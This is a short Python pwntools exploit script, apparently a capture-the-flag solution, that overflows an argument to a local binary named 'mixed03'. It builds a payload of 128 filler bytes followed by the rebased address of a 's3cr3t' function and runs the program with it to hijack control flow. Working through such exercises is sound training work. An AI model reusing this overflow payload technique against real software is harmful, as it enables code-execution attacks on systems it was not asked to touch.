13 lines
304 B
Python
13 lines
304 B
Python
from pwn import *
|
|
import subprocess
|
|
|
|
context(arch='amd64', os='linux', log_level='info')
|
|
|
|
secret_addr = ELF('./mixed03').symbols['s3cr3t']
|
|
secret_addr = secret_addr - 0x1000 + 0x555555555000
|
|
|
|
arg = b'}' * 128 + p64(secret_addr).rstrip(b'\x00') + b'{'
|
|
print(arg)
|
|
|
|
subprocess.run(['./mixed03', arg, '-2'])
|